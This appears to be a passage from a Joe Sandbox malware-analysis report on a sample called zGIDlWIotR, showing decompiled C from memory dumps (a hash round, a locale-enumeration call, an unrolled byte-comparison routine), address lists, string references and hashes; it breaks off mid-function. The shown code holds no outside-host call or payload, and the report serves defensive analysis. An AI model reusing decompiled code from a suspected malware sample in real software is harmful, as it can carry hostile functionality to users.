				_t670 = (( !_t884 | _t1179) ^ _t785) + _v12 +  *((intOrPtr*)(_t1181 + 0x34)) + 0x4e0811a1 + _t1179;
				 *0x3ce590 = _t1371;
				_v12 = _t670;
				asm("rol ecx, 0x6");
				_t671 =  *0x3ce610; // 0x7e9f9aaf
				_v24 = _t671;
				asm("fild dword [ebp-0x14]");
				_a4 = (( !_t785 | _t670) ^ _t1179) +  *((intOrPtr*)(_t1181 + 0x10)) + _t884 - 0x8ac817e + _t670;
				_v24 = _t1371;
				_t672 = E0039CABC();
				_t1099 = _a4;
				 *0x3ce610 = _t672;
				_t673 = _v12;
				 *0x3ce550 = 0x1dabba5e;
				asm("rol ebx, 0xa");
				_t787 = (( !_t1179 | _t1099) ^ _t673) +  *((intOrPtr*)(_t1181 + 0x2c)) + _t785 - 0x42c50dcb + _t1099;
				 *0x3ce4a0 =  *0x3ce4a0 -  *0x3c7630;
				asm("rol ecx, 0xf");
				_t894 = (( !_t673 | _t787) ^ _t1099) + _t1179 +  *(_t1181 + 8) + 0x2ad7d2bb + _t787;
				 *0x3ce2b8 =  *0x3ce2b8 + st2;
				_t678 =  *0x3ce2b8; // 0xf3310000
				_t1180 =  *0x3ce2bc; // 0x424f8dcb
				_v28 = _t678;
				_v24 = _t1180;
				asm("fucompp");
				asm("fnstsw ax");
				_t1381 =  *0x3ce1b8;
				asm("faddp st2, st0");
				asm("fxch st0, st1");
				 *0x3ce1b8 = _t1381;
				if((_t678 & 0x00000044) != 0) {
					st0 = _t1381;
				} else {
					st0 =  *0x3ce518;
					st0 =  *0x3ce170;
					st0 =  *0x3ce348;
					_t1386 =  *0x3ce518 - st1;
					 *0x3ce518 = _t1386;
					 *0x3ce348 = _t1386 +  *0x3ce348;
				}
				_t684 = _v32;
				 *((intOrPtr*)(_t684 + 8)) =  *((intOrPtr*)(_t684 + 8)) + _t1099;
				 *((intOrPtr*)(_t684 + 0x10)) =  *((intOrPtr*)(_t684 + 0x10)) + _t894;
				asm("ror esi, 0xb");
				 *((intOrPtr*)(_t684 + 0xc)) =  *((intOrPtr*)(_t684 + 0xc)) + (( !_t1099 | _t894) ^ _t787) +  *((intOrPtr*)(_t1181 + 0x24)) + _v12 - 0x14792c6f + _t894;
				 *((intOrPtr*)(_t684 + 0x14)) =  *((intOrPtr*)(_t684 + 0x14)) + _t787;
				return _t684;
			}

0x00393076
0x00393079
0x0039307e
0x00393082
0x00393085
0x00393097
0x0039309a
0x003930a1
0x003930a7
0x003930b1
0x003930b4
0x003930b7
0x003930ba
0x003930bc
0x003930bf
0x003930c5
0x003930ca
0x003930cd
0x003930d0
0x003930d3
0x003930d9
0x003930de
0x003930e1
0x003930ff
0x0039310b
0x0039310e
0x00393111
0x00393114
0x00393118
0x00393125
0x0039312e
0x00393140
0x00393146
0x00393149
0x0039314c
0x0039314f
0x00393151
0x00393154
0x00393157
0x00393163
0x00393168
0x00393173
0x00393177
0x00393179
0x0039318b
0x00393194
0x0039319d
0x0039319f
0x003931a9
0x003931b5
0x003931b7
0x003931b9
0x003931bb
0x003931bd
0x003931c6
0x003931ce
0x003931d4
0x003931d4
0x003931da
0x003931f6
0x003931f9
0x00393216
0x0039321e
0x00393221
0x00393229
0x00393232
0x00393235
0x0039323b
0x00393241
0x0039324b
0x0039324e
0x00393269
0x00393275
0x00393278
0x0039327b
0x0039327e
0x00393282
0x0039328d
0x00393293
0x00393299
0x003932a9
0x003932c0
0x003932c3
0x003932d4
0x003932e1
0x003932e4
0x003932ff
0x00393305
0x00393308
0x0039330b
0x0039330e
0x00393310
0x00393313
0x00393320
0x00393330
0x0039333e
0x00393344
0x00393356
0x00393366
0x00393369
0x00393385
0x00393388
0x003933a1
0x003933a4
0x003933b3
0x003933ba
0x003933d1
0x003933e5
0x003933ed
0x003933f0
0x003933f7
0x003933fd
0x00393400
0x00393406
0x0039340e
0x0039341b
0x00393425
0x0039342f
0x00393432
0x00393435
0x00393443
0x00393456
0x0039345c
0x0039345f
0x00393463
0x00393465
0x0039347d
0x00393480
0x00393484
0x00393486
0x003934a3
0x003934a4
0x003934a7
0x003934aa
0x003934ac
0x003934af
0x003934b2
0x003934b5
0x003934be
0x003934c7
0x003934d3
0x003934d5
0x003934dd
0x003934df
0x003934e8
0x003934ea
0x003934f1
0x003934f8
0x003934fb
0x003934fe
0x003934fe
0x00393510
0x0039351d
0x00393530
0x00393535
0x0039353b
0x0039353e
0x00393541
0x00393544
0x0039354a
0x0039354f
0x00393552
0x00393555
0x0039356b
0x00393571
0x0039357c
0x00393582
0x00393589
0x0039358f
0x00393590
0x00393593
0x00393596
0x00393599
0x0039359c
0x003935a1
0x003935f2
0x003935a3
0x003935a3
0x003935b3
0x003935b6
0x003935b9
0x003935c5
0x003935ca
0x003935cd
0x003935d0
0x003935de
0x003935de
0x003935fe
0x00393607
0x00393609
0x00393615
0x0039362d
0x00393636
0x00393639
0x0039363f
0x00393644
0x00393649
0x0039364c
0x0039364f
0x00393658
0x0039365b
0x00393660
0x00393667
0x00393667
0x00393683
0x00393691
0x0039369e
0x003936a7
0x003936ad
0x003936cd
0x003936d0
0x003936db
0x003936f3
0x003936f8
0x003936fb
0x0039370c
0x0039371f
0x00393735
0x0039374e
0x00393751
0x00393754
0x0039375a
0x0039376b
0x0039377b
0x0039377e
0x00393780
0x00393797
0x003937af
0x003937b2
0x003937b8
0x003937c3
0x003937d1
0x003937dd
0x003937e9
0x003937ec
0x003937ef
0x003937fa
0x00393805
0x0039380b
0x00393812
0x00393829
0x00393847
0x00393852
0x00393858
0x00393860
0x00393866
0x0039387d
0x00393880
0x00393883
0x00393885
0x00393888
0x0039388b
0x00393890
0x00393892
0x00393892
0x003938b5
0x003938ba
0x003938c0
0x003938c3
0x003938c5
0x003938ca
0x003938d2
0x003938e0
0x003938e6
0x003938eb
0x003938f5
0x00393901
0x00393901
0x003938eb
0x00393910
0x0039391d
0x00393922
0x00393928
0x00393933
0x00393938
0x0039393f
0x00393948
0x00393954
0x00393969
0x0039396c
0x00393974
0x00393977
0x00393979
0x0039397c
0x0039397f
0x00393981
0x00393987
0x0039398d
0x0039399a
0x0039399c
0x003939a2
0x003939af
0x003939b2
0x003939b5
0x003939be
0x003939c4
0x003939c7
0x003939ca
0x003939cd
0x003939d3
0x003939d8
0x003939db
0x003939e8
0x003939e8
0x003939f9
0x00393a04
0x00393a0d
0x00393a10
0x00393a1f
0x00393a22
0x00393a24
0x00393a26
0x00393a2c
0x00393a2e
0x00393a33
0x00393a36
0x00393a39
0x00393a3f
0x00393a3f
0x00393a4f
0x00393a69
0x00393a76
0x00393a7b
0x00393a7e
0x00393a8d
0x00393aa7
0x00393aaa
0x00393ab0
0x00393abd
0x00393aca
0x00393ad0
0x00393ad5
0x00393ad8
0x00393ae1
0x00393ae4
0x00393ae7
0x00393af0
0x00393af6
0x00393afe
0x00393b16
0x00393b1f
0x00393b26
0x00393b37
0x00393b40
0x00393b48
0x00393b54
0x00393b54
0x00393b60
0x00393b69
0x00393b71
0x00393b7a
0x00393b80
0x00393b8f
0x00393b99
0x00393b9f
0x00393ba6
0x00393bac
0x00393baf
0x00393bb2
0x00393bb4
0x00393bb7
0x00393bbd
0x00393bc0
0x00393bc3
0x00393bcf
0x00393bd1
0x00393bda
0x00393bed
0x00393bf8
0x00393bfe
0x00393c04
0x00393c07
0x00393c1c
0x00393c1f
0x00393c3a
0x00393c41
0x00393c44
0x00393c4f
0x00393c59
0x00393c5e
0x00393c61
0x00393c67
0x00393c70
0x00393c78
0x00393c7b
0x00393c84
0x00393c89
0x00393c8c
0x00393c8f
0x00393c95
0x00393c9d
0x00393ca0
0x00393ca3
0x00393ca6
0x00393ca8
0x00393cad
0x00393cd7
0x00393cdc
0x00393cdf
0x00393ce2
0x00393cf1
0x00393cf7
0x00393cfa
0x00393cff
0x00393d02
0x00393d0d
0x00393d0f
0x00393caf
0x00393cb5
0x00393cc1
0x00393ccd
0x00393ccf
0x00393ccf
0x00393d15
0x00393d18
0x00393d28
0x00393d2b
0x00393d2d
0x00393d37
0x00393d3a
0x00393d41
0x00393d44
0x00393d4a
0x00393d4d
0x00393d56
0x00393d66
0x00393d69
0x00393d6c
0x00393d6e
0x00393d71
0x00393d7a
0x00393d85
0x00393d91
0x00393d9e
0x00393da6
0x00393dad
0x00393dba
0x00393dc2
0x00393dd0
0x00393ddc
0x00393dde
0x00393dde
0x00393de4
0x00393deb
0x00393df5
0x00393dfe
0x00393e00
0x00393e12
0x00393e1c
0x00393e26
0x00393e29
0x00393e2f
0x00393e30
0x00393e33
0x00393e36
0x00393e39
0x00393e3c
0x00393e3e
0x00393e41
0x00393e44
0x00393e4d
0x00393e50
0x00393e53
0x00393e5d
0x00393e66
0x00393e68
0x00393e72
0x00393e72
0x00393e7e
0x00393e8e
0x00393e91
0x00393eaf
0x00393ec0
0x00393ec6
0x00393ec9
0x00393ed0
0x00393ed3
0x00393eda
0x00393edf
0x00393ee9
0x00393eed
0x00393ef0
0x00393ef5
0x00393ef8
0x00393efb
0x00393efe
0x00393f01
0x00393f06
0x00393f08
0x00393f08
0x00393f12
0x00393f19
0x00393f1c
0x00393f1f
0x00393f22
0x00393f2a
0x00393f2d
0x00393f39
0x00393f47
0x00393f53
0x00393f5b
0x00393f5e
0x00393f6a
0x00393f72
0x00393f82
0x00393f85
0x00393f99
0x00393f9f
0x00393fa2
0x00393fa4
0x00393fad
0x00393fb5
0x00393fc5
0x00393fc8
0x00393fcb
0x00393fce
0x00393fce
0x00393fe8
0x00393ff1
0x00393ff4
0x00393ffa
0x00394008
0x0039400b
0x0039400e
0x0039400e
0x00394015
0x00394018
0x00394021
0x0039402d
0x00394033
0x00394036
0x00394039
0x0039403c
0x00394043
0x00394046
0x00394049
0x00394051
0x00394053
0x00394059
0x00394062
0x00394064
0x00394070
0x00394073
0x00394076
0x00394082
0x00394088
0x00394088
0x00394095
0x003940a1
0x003940a6
0x003940a9
0x003940ac
0x003940ba
0x003940d1
0x003940e1
0x003940ed
0x003940f0
0x003940f3
0x003940fc
0x00394102
0x0039410c
0x00394116
0x00394119
0x0039411c
0x00394131
0x00394134
0x00394139
0x0039414b
0x00394155
0x0039415e
0x00394160
0x00394163
0x00394166
0x00394169
0x0039416b
0x00394170
0x00394172
0x0039417e
0x00394181
0x00394184
0x0039418d
0x00394194
0x0039419a
0x0039419d
0x003941a0
0x003941a3
0x003941ab
0x003941ab
0x003941b1
0x003941d6
0x003941dd
0x003941e0
0x003941f4
0x003941f7
0x0039420f
0x00394212
0x00394222
0x00394225
0x00394239
0x0039423e
0x00394241
0x00394246
0x00394253
0x00394256
0x00394259
0x00394262
0x00394265
0x0039426b
0x00394272
0x00394279
0x0039427f
0x0039428a
0x0039428d
0x0039429d
0x003942a2
0x003942a8
0x003942ad
0x003942b0
0x003942b6
0x003942bb
0x003942cf
0x003942db
0x003942de
0x003942e4
0x003942ee
0x00394303
0x00394306
0x0039430e
0x00394311
0x00394314
0x00394316
0x00394319
0x00394322
0x00394325
0x00394327
0x0039432c
0x0039432e
0x00394333
0x00394338
0x0039433b
0x0039433e
0x0039434a
0x00394350
0x00394352
0x00394357
0x00394359
0x0039435f
0x00394362
0x00394365
0x00394371
0x00394377
0x00394377
0x00394357
0x00394388
0x0039439a
0x0039439d
0x003943aa
0x003943b0
0x003943ba
0x003943bf
0x003943c4
0x003943c7
0x003943ca
0x003943cd
0x003943d9
0x003943de
0x003943e1
0x003943e6
0x00394400
0x00394416
0x00394419
0x0039441d
0x00394436
0x00394439
0x0039443b
0x00394441
0x00394446
0x00394452
0x00394455
0x00394461
0x00394463
0x00394465
0x0039446b
0x0039446d
0x0039446f
0x00394478
0x003944ae
0x0039447a
0x00394480
0x00394488
0x00394490
0x00394498
0x0039449a
0x003944a6
0x003944a6
0x003944c5
0x003944c8
0x003944cb
0x003944ce
0x003944d3
0x003944d6
0x003944df

Strings

(9|', xrefs: 003938B5, 003938BA, 00394359, 00394377
# %, xrefs: 00393DBD
Hl, xrefs: 00393BDA, 00393BF8

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID:
String ID: # %$(9|'$Hl
API String ID: 0-309419162
Opcode ID: e92c52e7974358c889d0f8c97ab015a513b93e48ee24cf6bd6d7d142328c9251
Instruction ID: 49152a49d4c06a0f1435d3306ddeeb1da51aa2e2f993a039cf7d740cfe6294e0
Opcode Fuzzy Hash: e92c52e7974358c889d0f8c97ab015a513b93e48ee24cf6bd6d7d142328c9251
Instruction Fuzzy Hash: FCD2E475A01609CFDB09CF55ED849E87BB9FB88300F268459C885E3368DB35BA65CF84

Uniqueness

Uniqueness Score: -1.00%

Function 003BE867 Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E003BE867(void* __esi, void* __eflags) {
				void* _t7;
				int _t11;

				_t7 = E003A0330();
				asm("sbb eax, eax");
				 *((intOrPtr*)(__esi + 0x14)) =  ~(_t7 - 3) + 1;
				_t11 = EnumSystemLocalesA(E003BE4D1, 1);
				if(( *(__esi + 8) & 0x00000004) == 0) {
					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
					return _t11;
				}
				return _t11;
			}

0x003be867
0x003be872
0x003be87c
0x003be87f
0x003be889
0x003be88b
0x00000000
0x003be88b
0x003be88f

APIs

_strlen.LIBCMT ref: 003BE867
EnumSystemLocalesA.KERNEL32(Function_0003E4D1,00000001), ref: 003BE87F

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: EnumLocalesSystem_strlen
String ID:
API String ID: 216762292-0
Opcode ID: 46afd16a226d3a6645f69cd88488ece07f99fd80a9d859a4649eecb747f762bf
Instruction ID: d82b165745136922831650e499240b24b78e8dca52d67c41b024e8341c8d9be6
Opcode Fuzzy Hash: 46afd16a226d3a6645f69cd88488ece07f99fd80a9d859a4649eecb747f762bf
Instruction Fuzzy Hash: 1DD0A9B1A20B0A0AEB268F78D9487B0BAD4EB12F08F508A0CDE82C48C0C2B4A4448201

Uniqueness

Uniqueness Score: -1.00%

Function 003C0040 Relevance: 1.7, Strings: 1, Instructions: 489
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003C0040(signed char* _a4, char _a8, signed int _a12) {
				signed int _t984;
				void* _t986;
				signed int _t988;
				void* _t989;
				void* _t991;
				void* _t993;
				void* _t994;
				void* _t996;
				void* _t998;
				void* _t1001;
				void* _t1003;
				void* _t1005;
				signed char* _t1006;
				void* _t1007;
				signed int _t1108;
				signed char* _t1111;
				signed char* _t1112;
				signed char* _t1113;
				signed char* _t1114;
				void* _t1134;
				signed int _t1135;
				void* _t1136;
				signed char* _t1137;
				signed char* _t1138;
				signed char* _t1139;
				void* _t1149;
				void* _t1151;
				void* _t1153;
				void* _t1156;
				void* _t1158;
				void* _t1160;
				void* _t1163;
				void* _t1165;
				void* _t1167;
				void* _t1170;
				void* _t1172;
				void* _t1174;
				void* _t1177;
				void* _t1179;
				void* _t1181;
				void* _t1184;
				void* _t1186;
				void* _t1188;
				void* _t1191;
				void* _t1193;
				void* _t1195;
				void* _t1198;
				void* _t1200;
				void* _t1202;

				_t1135 = _a12;
				_t984 = _t1135;
				if(_t984 == 0) {
					return 0;
				}
				_t986 = _t984 - 1;
				if(_t986 == 0) {
					_t982 =  &_a8; // 0x3b695d
					_t988 =  *_a4 & 0x000000ff;
					_t1108 =  *( *_t982) & 0x000000ff;
					L426:
					_t989 = _t988 - _t1108;
					if(_t989 == 0) {
						L438:
						return _t989;
					}
					_t958 = (0 | _t989 > 0x00000000) - 1; // -1
					return (_t989 > 0) + _t958;
				}
				_t991 = _t986 - 1;
				if(_t991 == 0) {
					_t1111 = _a4;
					_t974 =  &_a8; // 0x3b695d
					_t1137 =  *_t974;
					_t993 = ( *_t1111 & 0x000000ff) - ( *_t1137 & 0x000000ff);
					if(_t993 == 0) {
						L435:
						_t988 = _t1111[1] & 0x000000ff;
						_t1108 = _t1137[1] & 0x000000ff;
						goto L426;
					}
					_t978 = (0 | _t993 > 0x00000000) - 1; // -1
					_t989 = (_t993 > 0) + _t978;
					if(_t989 != 0) {
						goto L438;
					}
					goto L435;
				}
				_t994 = _t991 - 1;
				if(_t994 == 0) {
					_t1112 = _a4;
					_t960 =  &_a8; // 0x3b695d
					_t1138 =  *_t960;
					_t996 = ( *_t1112 & 0x000000ff) - ( *_t1138 & 0x000000ff);
					if(_t996 == 0) {
						L430:
						_t998 = (_t1112[1] & 0x000000ff) - (_t1138[1] & 0x000000ff);
						if(_t998 == 0) {
							L432:
							_t988 = _t1112[2] & 0x000000ff;
							_t1108 = _t1138[2] & 0x000000ff;
							goto L426;
						}
						_t970 = (0 | _t998 > 0x00000000) - 1; // -1
						_t989 = (_t998 > 0) + _t970;
						if(_t989 != 0) {
							goto L438;
						}
						goto L432;
					}
					_t964 = (0 | _t996 > 0x00000000) - 1; // -1
					_t989 = (_t996 > 0) + _t964;
					if(_t989 != 0) {
						goto L438;
					}
					goto L430;
				}
				if(_t994 == 1) {
					_t1113 = _a4;
					_t936 =  &_a8; // 0x3b695d
					_t1139 =  *_t936;
					_t1001 = ( *_t1113 & 0x000000ff) - ( *_t1139 & 0x000000ff);
					if(_t1001 == 0) {
						L421:
						_t1003 = (_t1113[1] & 0x000000ff) - (_t1139[1] & 0x000000ff);
						if(_t1003 == 0) {
							L423:
							_t1005 = (_t1113[2] & 0x000000ff) - (_t1139[2] & 0x000000ff);
							if(_t1005 == 0) {
								L425:
								_t988 = _t1113[3] & 0x000000ff;
								_t1108 = _t1139[3] & 0x000000ff;
								goto L426;
							}
							_t952 = (0 | _t1005 > 0x00000000) - 1; // -1
							_t989 = (_t1005 > 0) + _t952;
							if(_t989 != 0) {
								goto L438;
							}
							goto L425;
						}
						_t946 = (0 | _t1003 > 0x00000000) - 1; // -1
						_t989 = (_t1003 > 0) + _t946;
						if(_t989 != 0) {
							goto L438;
						}
						goto L423;
					}
					_t940 = (0 | _t1001 > 0x00000000) - 1; // -1
					_t989 = (_t1001 > 0) + _t940;
					if(_t989 != 0) {
						goto L438;
					}
					goto L421;
				} else {
					_t2 =  &_a8; // 0x3b695d
					_t1114 =  *_t2;
					_t1006 = _a4;
					_t1134 = 0x20;
					while(_t1135 >= _t1134) {
						if( *_t1006 ==  *_t1114) {
							_t1136 = 0;
							L16:
							if(_t1136 != 0) {
								L98:
								_t1007 = _t1136;
								L178:
								return _t1007;
							}
							if(_t1006[4] == _t1114[4]) {
								_t1136 = 0;
								L27:
								if(_t1136 != 0) {
									goto L98;
								}
								if(_t1006[8] == _t1114[8]) {
									_t1136 = 0;
									L38:
									if(_t1136 != 0) {
										goto L98;
									}
									if(_t1006[0xc] == _t1114[0xc]) {
										_t1136 = 0;
										L49:
										if(_t1136 != 0) {
											goto L98;
										}
										if(_t1006[0x10] == _t1114[0x10]) {
											_t1136 = 0;
											L60:
											if(_t1136 != 0) {
												goto L98;
											}
											if(_t1006[0x14] == _t1114[0x14]) {
												_t1136 = 0;
												L71:
												if(_t1136 != 0) {
													goto L98;
												}
												if(_t1006[0x18] == _t1114[0x18]) {
													_t1136 = 0;
													L82:
													if(_t1136 != 0) {
														goto L98;
													}
													if(_t1006[0x1c] == _t1114[0x1c]) {
														_t1136 = 0;
														L93:
														if(_t1136 != 0) {
															goto L98;
														} else {
															_t1006 =  &(_t1006[_t1134]);
															_t1114 =  &(_t1114[_t1134]);
															_t1135 = _t1135 - _t1134;
															continue;
														}
													}
													_t1149 = (_t1006[0x1c] & 0x000000ff) - (_t1114[0x1c] & 0x000000ff);
													if(_t1149 == 0) {
														L86:
														_t1151 = (_t1006[0x1d] & 0x000000ff) - (_t1114[0x1d] & 0x000000ff);
														if(_t1151 == 0) {
															L88:
															_t1153 = (_t1006[0x1e] & 0x000000ff) - (_t1114[0x1e] & 0x000000ff);
															if(_t1153 == 0) {
																L90:
																_t1136 = (_t1006[0x1f] & 0x000000ff) - (_t1114[0x1f] & 0x000000ff);
																if(_t1136 != 0) {
																	_t207 = (0 | _t1136 > 0x00000000) - 1; // -1
																	_t1136 = (_t1136 > 0) + _t207;
																}
																goto L93;
															}
															_t201 = (0 | _t1153 > 0x00000000) - 1; // -1
															_t1136 = (_t1153 > 0) + _t201;
															if(_t1136 != 0) {
																goto L98;
															}
															goto L90;
														}
														_t195 = (0 | _t1151 > 0x00000000) - 1; // -1
														_t1136 = (_t1151 > 0) + _t195;
														if(_t1136 != 0) {
															goto L98;
														}
														goto L88;
													}
													_t189 = (0 | _t1149 > 0x00000000) - 1; // -1
													_t1136 = (_t1149 > 0) + _t189;
													if(_t1136 != 0) {
														goto L98;
													}
													goto L86;
												}
												_t1156 = (_t1006[0x18] & 0x000000ff) - (_t1114[0x18] & 0x000000ff);
												if(_t1156 == 0) {
													L75:
													_t1158 = (_t1006[0x19] & 0x000000ff) - (_t1114[0x19] & 0x000000ff);
													if(_t1158 == 0) {
														L77:
														_t1160 = (_t1006[0x1a] & 0x000000ff) - (_t1114[0x1a] & 0x000000ff);
														if(_t1160 == 0) {
															L79:
															_t1136 = (_t1006[0x1b] & 0x000000ff) - (_t1114[0x1b] & 0x000000ff);
															if(_t1136 != 0) {
																_t181 = (0 | _t1136 > 0x00000000) - 1; // -1
																_t1136 = (_t1136 > 0) + _t181;
															}
															goto L82;
														}
														_t175 = (0 | _t1160 > 0x00000000) - 1; // -1
														_t1136 = (_t1160 > 0) + _t175;
														if(_t1136 != 0) {
															goto L98;
														}
														goto L79;
													}
													_t169 = (0 | _t1158 > 0x00000000) - 1; // -1
													_t1136 = (_t1158 > 0) + _t169;
													if(_t1136 != 0) {
														goto L98;
													}
													goto L77;
												}
												_t163 = (0 | _t1156 > 0x00000000) - 1; // -1
												_t1136 = (_t1156 > 0) + _t163;
												if(_t1136 != 0) {
													goto L98;
												}
												goto L75;
											}
											_t1163 = (_t1006[0x14] & 0x000000ff) - (_t1114[0x14] & 0x000000ff);
											if(_t1163 == 0) {
												L64:
												_t1165 = (_t1006[0x15] & 0x000000ff) - (_t1114[0x15] & 0x000000ff);
												if(_t1165 == 0) {
													L66:
													_t1167 = (_t1006[0x16] & 0x000000ff) - (_t1114[0x16] & 0x000000ff);
													if(_t1167 == 0) {
														L68:
														_t1136 = (_t1006[0x17] & 0x000000ff) - (_t1114[0x17] & 0x000000ff);
														if(_t1136 != 0) {
															_t155 = (0 | _t1136 > 0x00000000) - 1; // -1
															_t1136 = (_t1136 > 0) + _t155;
														}
														goto L71;
													}
													_t149 = (0 | _t1167 > 0x00000000) - 1; // -1
													_t1136 = (_t1167 > 0) + _t149;
													if(_t1136 != 0) {
														goto L98;
													}
													goto L68;
												}
												_t143 = (0 | _t1165 > 0x00000000) - 1; // -1
												_t1136 = (_t1165 > 0) + _t143;
												if(_t1136 != 0) {
													goto L98;
												}
												goto L66;
											}
											_t137 = (0 | _t1163 > 0x00000000) - 1; // -1
											_t1136 = (_t1163 > 0) + _t137;
											if(_t1136 != 0) {
												goto L98;
											}
											goto L64;
										}
										_t1170 = (_t1006[0x10] & 0x000000ff) - (_t1114[0x10] & 0x000000ff);
										if(_t1170 == 0) {
											L53:
											_t1172 = (_t1006[0x11] & 0x000000ff) - (_t1114[0x11] & 0x000000ff);
											if(_t1172 == 0) {
												L55:
												_t1174 = (_t1006[0x12] & 0x000000ff) - (_t1114[0x12] & 0x000000ff);
												if(_t1174 == 0) {
													L57:
													_t1136 = (_t1006[0x13] & 0x000000ff) - (_t1114[0x13] & 0x000000ff);
													if(_t1136 != 0) {
														_t129 = (0 | _t1136 > 0x00000000) - 1; // -1
														_t1136 = (_t1136 > 0) + _t129;
													}
													goto L60;
												}
												_t123 = (0 | _t1174 > 0x00000000) - 1; // -1
												_t1136 = (_t1174 > 0) + _t123;
												if(_t1136 != 0) {
													goto L98;
												}
												goto L57;
											}
											_t117 = (0 | _t1172 > 0x00000000) - 1; // -1
											_t1136 = (_t1172 > 0) + _t117;
											if(_t1136 != 0) {
												goto L98;
											}
											goto L55;
										}
										_t111 = (0 | _t1170 > 0x00000000) - 1; // -1
										_t1136 = (_t1170 > 0) + _t111;
										if(_t1136 != 0) {
											goto L98;
										}
										goto L53;
									}
									_t1177 = (_t1006[0xc] & 0x000000ff) - (_t1114[0xc] & 0x000000ff);
									if(_t1177 == 0) {
										L42:
										_t1179 = (_t1006[0xd] & 0x000000ff) - (_t1114[0xd] & 0x000000ff);
										if(_t1179 == 0) {
											L44:
											_t1181 = (_t1006[0xe] & 0x000000ff) - (_t1114[0xe] & 0x000000ff);
											if(_t1181 == 0) {
												L46:
												_t1136 = (_t1006[0xf] & 0x000000ff) - (_t1114[0xf] & 0x000000ff);
												if(_t1136 != 0) {
													_t103 = (0 | _t1136 > 0x00000000) - 1; // -1
													_t1136 = (_t1136 > 0) + _t103;
												}
												goto L49;
											}
											_t97 = (0 | _t1181 > 0x00000000) - 1; // -1
											_t1136 = (_t1181 > 0) + _t97;
											if(_t1136 != 0) {
												goto L98;
											}
											goto L46;
										}
										_t91 = (0 | _t1179 > 0x00000000) - 1; // -1
										_t1136 = (_t1179 > 0) + _t91;
										if(_t1136 != 0) {
											goto L98;
										}
										goto L44;
									}
									_t85 = (0 | _t1177 > 0x00000000) - 1; // -1
									_t1136 = (_t1177 > 0) + _t85;
									if(_t1136 != 0) {
										goto L98;
									}
									goto L42;
								}
								_t1184 = (_t1006[8] & 0x000000ff) - (_t1114[8] & 0x000000ff);
								if(_t1184 == 0) {
									L31:
									_t1186 = (_t1006[9] & 0x000000ff) - (_t1114[9] & 0x000000ff);
									if(_t1186 == 0) {
										L33:
										_t1188 = (_t1006[0xa] & 0x000000ff) - (_t1114[0xa] & 0x000000ff);
										if(_t1188 == 0) {
											L35:
											_t1136 = (_t1006[0xb] & 0x000000ff) - (_t1114[0xb] & 0x000000ff);
											if(_t1136 != 0) {
												_t77 = (0 | _t1136 > 0x00000000) - 1; // -1
												_t1136 = (_t1136 > 0) + _t77;
											}
											goto L38;
										}
										_t71 = (0 | _t1188 > 0x00000000) - 1; // -1
										_t1136 = (_t1188 > 0) + _t71;
										if(_t1136 != 0) {
											goto L98;
										}
										goto L35;
									}
									_t65 = (0 | _t1186 > 0x00000000) - 1; // -1
									_t1136 = (_t1186 > 0) + _t65;
									if(_t1136 != 0) {
										goto L98;
									}
									goto L33;
								}
								_t59 = (0 | _t1184 > 0x00000000) - 1; // -1
								_t1136 = (_t1184 > 0) + _t59;
								if(_t1136 != 0) {
									goto L98;
								}
								goto L31;
							}
							_t1191 = (_t1006[4] & 0x000000ff) - (_t1114[4] & 0x000000ff);
							if(_t1191 == 0) {
								L20:
								_t1193 = (_t1006[5] & 0x000000ff) - (_t1114[5] & 0x000000ff);
								if(_t1193 == 0) {
									L22:
									_t1195 = (_t1006[6] & 0x000000ff) - (_t1114[6] & 0x000000ff);
									if(_t1195 == 0) {
										L24:
										_t1136 = (_t1006[7] & 0x000000ff) - (_t1114[7] & 0x000000ff);
										if(_t1136 != 0) {
											_t51 = (0 | _t1136 > 0x00000000) - 1; // -1
											_t1136 = (_t1136 > 0) + _t51;
										}
										goto L27;
									}
									_t45 = (0 | _t1195 > 0x00000000) - 1; // -1
									_t1136 = (_t1195 > 0) + _t45;
									if(_t1136 != 0) {
										goto L98;
									}
									goto L24;
								}
								_t39 = (0 | _t1193 > 0x00000000) - 1; // -1
								_t1136 = (_t1193 > 0) + _t39;
								if(_t1136 != 0) {
									goto L98;
								}
								goto L22;
							}
							_t33 = (0 | _t1191 > 0x00000000) - 1; // -1
							_t1136 = (_t1191 > 0) + _t33;
							if(_t1136 != 0) {
								goto L98;
							}
							goto L20;
						}
						_t1198 = ( *_t1006 & 0x000000ff) - ( *_t1114 & 0x000000ff);
						if(_t1198 == 0) {
							L9:
							_t1200 = (_t1006[1] & 0x000000ff) - (_t1114[1] & 0x000000ff);
							if(_t1200 == 0) {
								L11:
								_t1202 = (_t1006[2] & 0x000000ff) - (_t1114[2] & 0x000000ff);
								if(_t1202 == 0) {
									L13:
									_t1136 = (_t1006[3] & 0x000000ff) - (_t1114[3] & 0x000000ff);
									if(_t1136 != 0) {
										_t25 = (0 | _t1136 > 0x00000000) - 1; // -1
										_t1136 = (_t1136 > 0) + _t25;
									}
									goto L16;
								}
								_t19 = (0 | _t1202 > 0x00000000) - 1; // -1
								_t1136 = (_t1202 > 0) + _t19;
								if(_t1136 != 0) {
									goto L98;
								}
								goto L13;
							}
							_t13 = (0 | _t1200 > 0x00000000) - 1; // -1
							_t1136 = (_t1200 > 0) + _t13;
							if(_t1136 != 0) {
								goto L98;
							}
